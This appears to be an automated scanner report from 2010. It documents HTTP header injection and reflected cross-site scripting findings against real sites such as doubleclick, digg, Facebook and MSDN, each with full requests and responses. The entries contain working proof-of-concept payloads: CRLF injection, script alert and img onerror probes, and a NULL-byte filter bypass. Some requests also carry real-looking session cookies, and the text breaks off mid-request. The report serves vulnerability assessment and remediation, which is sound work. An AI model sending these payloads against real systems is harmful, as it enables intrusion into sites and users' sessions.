HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/N4390.no_url_specifiedOX2495/B4882317.27 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4390.no_url_specifiedOX2495/B4882317.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ec36%0d%0aee4caf17b88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ec36%0d%0aee4caf17b88/N4390.no_url_specifiedOX2495/B4882317.27 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ec36
ee4caf17b88
/N4390.no_url_specifiedOX2495/B4882317.27:
Date: Sat, 11 Dec 2010 17:58:38 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adj/N5811.6393.MYSPACE/B5015899 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5811.6393.MYSPACE/B5015899

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 71417%0d%0a24e536cd9bc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /71417%0d%0a24e536cd9bc/N5811.6393.MYSPACE/B5015899;sz=300x250;click=http://demr.opt.fimserve.com/lnk/?ek=ACG08K6QAu-50ciAUFyu_g1vWRK6xCufeZRioGttipdpYIHhIo1Tmf-eAjPrq7qr8WSGmgZemaJVJcp1KTVV_GnIwIO3mcXAJHjXkvmqllx0JS5NB2zFE5u-R3oFsOsuu4gJ75KaWoQNK-CXPm2PoM7PcWgcny9V1viFVFjcJOjXnHwyusqsueyd0b3CHolEGMBY1V5Qn-rDwX4Z22CB5u1F7t9VUi55J1JTxHBTOb19yLgi32VSspuMsiu6GLXSFiFdBXWfllZ6v6Kl6uLimt6xLBZZR59aJJzQxuAO1qoIpa1OD3L6R1PDXzRcLE0Cpghref=;ord=1292087967885? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=963501277&nwvert=2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/71417
24e536cd9bc
/N5811.6393.MYSPACE/B5015899;sz=300x250;click=http: //demr.opt.fimserve.com/lnk/
Date: Sat, 11 Dec 2010 17:49:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)  previous
There are 351 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5b51"><script>alert(1)</script>7a67c21e36c was submitted in the REST URL parameter 1. This input was echoed as b5b51"><script>alert(1)</script>7a67c21e36c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00b5b51"><script>alert(1)</script>7a67c21e36c/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:03:44 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00b5b51"><script>alert(1)</script>7a67c21e36c/2006/">
...[SNIP]...

2.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00bbe77<a>2359e70d7a6 was submitted in the REST URL parameter 1. This input was echoed as bbe77<a>2359e70d7a6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00bbe77<a>2359e70d7a6/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:03:45 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>2359e70d7a6/">weblog%00bbe77<a>2359e70d7a6</a>
...[SNIP]...

2.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 566c2<a>e6fcc6b2e57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base566c2<a>e6fcc6b2e57/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:04:23 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 11 Dec 2010 18:04:23 GMT
Last-Modified: Sat, 11 Dec 2010 18:04:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base566c2<a>e6fcc6b2e57/</h1>
...[SNIP]...

2.4. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a146b"><script>alert(1)</script>c78c2ed554b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a146b\"><script>alert(1)</script>c78c2ed554b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?a146b"><script>alert(1)</script>c78c2ed554b=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:03:02 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Sat, 11 Dec 2010 18:03:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 173973

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?a146b\"><script>alert(1)</script>c78c2ed554b=1#preview" method="post">
...[SNIP]...

2.5. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008d248"><script>alert(1)</script>a888f0f5543 was submitted in the REST URL parameter 1. This input was echoed as 8d248"><script>alert(1)</script>a888f0f5543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%008d248"><script>alert(1)</script>a888f0f5543 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 17:59:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Mon, 10-Jan-2011 17:59:21 GMT; path=/; domain=digg.com
Set-Cookie: d=81fc95189dccf51aa2fa5c680368e702008d457e5e85e02ae8b330c98fa0f463; expires=Fri, 11-Dec-2020 04:07:01 GMT; path=/; domain=.digg.com
X-Digg-Time: D=248985 10.2.128.108
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15297

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%008d248"><script>alert(1)</script>a888f0f5543.rss">
...[SNIP]...

2.6. http://events.nrf.com/annual2010/public/MainHall.aspx [exp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nrf.com
Path:   /annual2010/public/MainHall.aspx

Issue detail

The value of the exp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e996f"-alert(1)-"57ce3775cd6 was submitted in the exp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /annual2010/public/MainHall.aspx?ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6 HTTP/1.1
Host: events.nrf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 18:07:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b1hztn55j3hxyw454pesxjve; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30636


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n
...[SNIP]...
the full path from the qurystring.
                   strFullPath="/annual2010/public/MainHall.aspx";
                   
                   //Get only querystring
                   strQryValus="ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6";
                   arrstrFullPath=strFullPath.split("/");
                   
                   //Commented By Tulsi on 170062005
                   //strfileName=arrstrFullPath[5];
                   //Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length-1
...[SNIP]...

2.7. http://events.nrf.com/annual2010/public/MainHall.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nrf.com
Path:   /annual2010/public/MainHall.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79b66"-alert(1)-"e35552360be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /annual2010/public/MainHall.aspx?79b66"-alert(1)-"e35552360be=1 HTTP/1.1
Host: events.nrf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 17:59:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iuh00mfdl5xuqg452jimav45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30444


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n
...[SNIP]...
r strLang1="";
                   var strLang2="";
                   
                   //Get the full path from the qurystring.
                   strFullPath="/annual2010/public/MainHall.aspx";
                   
                   //Get only querystring
                   strQryValus="79b66"-alert(1)-"e35552360be=1";
                   arrstrFullPath=strFullPath.split("/");
                   
                   //Commented By Tulsi on 170062005
                   //strfileName=arrstrFullPath[5];
                   //Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length
...[SNIP]...

2.8. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://googleonline.webex.com
Path:   /ec0605lb/eventcenter/recording/recordAction.do

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66 was submitted in the REST URL parameter 1. This input was echoed as 3ed32<img src=a onerror=alert(1)>d81d4c9e66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ec0605lb3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66/eventcenter/recording/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:23 GMT
Server: Apache
Content-Length: 114
Set-Cookie: JSESSIONID=bMqHND8XhR6xdC4Z7g07qXWGR9RbyzJNtDmDxyygJDBvrZX2yQKb!-2086176403; path=/
Connection: close
Content-Type: text/html

Invalid path /ec0605lb3ed32<img src=a onerror=alert(1)>d81d4c9e66/eventcenter/recording/recordAction was requested

2.9. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://googleonline.webex.com
Path:   /ec0605lb/eventcenter/recording/recordAction.do

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9 was submitted in the REST URL parameter 2. This input was echoed as 9d92c<img src=a onerror=alert(1)>b4c765c70c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ec0605lb/eventcenter9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9/recording/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:27 GMT
Server: Apache
Content-Length: 106
Set-Cookie: JSESSIONID=L6BFND8bBTYMxXwwjl1kCft6FRJKL9qcdq6VlGt8nTDF4DP39wf6!1267178989; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html

Invalid path /eventcenter9d92c<img src=a onerror=alert(1)>b4c765c70c9/recording/recordAction was requested

2.10. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://googleonline.webex.com
Path:   /ec0605lb/eventcenter/recording/recordAction.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19 was submitted in the REST URL parameter 3. This input was echoed as 3e04b<img src=a onerror=alert(1)>edd90b20f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ec0605lb/eventcenter/recording3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:30 GMT
Server: Apache
Content-Length: 106
Set-Cookie: JSESSIONID=10vZND8pxx1kb88rC5wnwyXY12p8SVCYpyYQVGlrlvwg1t74CmgJ!1267178989; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html

Invalid path /eventcenter/recording3e04b<img src=a onerror=alert(1)>edd90b20f19/recordAction was requested

2.11. https://graph.facebook.com/oauth/authorize [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://graph.facebook.com
Path:   /oauth/authorize

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9802<script>alert(1)</script>e9157f8b18e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oauth/authorizee9802<script>alert(1)</script>e9157f8b18e?client_id=8744a0ccdce1491c4474dacf75dc2d12&redirect_uri=http://www.myspace.com/fbocallback&scope=email,offline_access,user_about_me,user_birthday,user_likes,publish_stream&display=popup HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown OAuth 2.0 method, authorizee9802<script>alert(1)</script>e9157f8b18e."
Set-Cookie: datr=QbcDTSBbj9Vvh3G0O-kWlzIe; expires=Mon, 10-Dec-2012 17:39:13 GMT; path=/; domain=.facebook.com; httponly
Connection: close
Date: Sat, 11 Dec 2010 17:39:13 GMT
Content-Length: 151

{
"error": {
"type": "OAuthException",
"message": "Unknown OAuth 2.0 method, authorizee9802<script>alert(1)</script>e9157f8b18e."
}
}

2.12. http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mike2.openmethodology.org
Path:   /wiki/Fusing_Enterprise_Search_and_Social_Bookmarking

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73a62"%3balert(1)//831b24e6265 was submitted in the REST URL parameter 2. This input was echoed as 73a62";alert(1)//831b24e6265 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62"%3balert(1)//831b24e6265 HTTP/1.1
Host: mike2.openmethodology.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:13:19 GMT
Server: Apache/2.2.17 (Unix)
X-Powered-By: PHP/5.2.14
Pragma: no-cache
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: openmeth_omwikidb_omw__session=o23sch2m9uit36jtq3cp8c5ho7; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">a2a_linkname="Fusing Enterprise Search and Social Bookmarking73a62";alert(1)//831b24e6265";a2a_linkurl="http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62%22;alert(1)//831b24e6265";    a2a_onclick=1;</script>
...[SNIP]...

2.13. http://msdn.microsoft.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d48"><a>3d147823d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?f6d48"><a>3d147823d73=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; 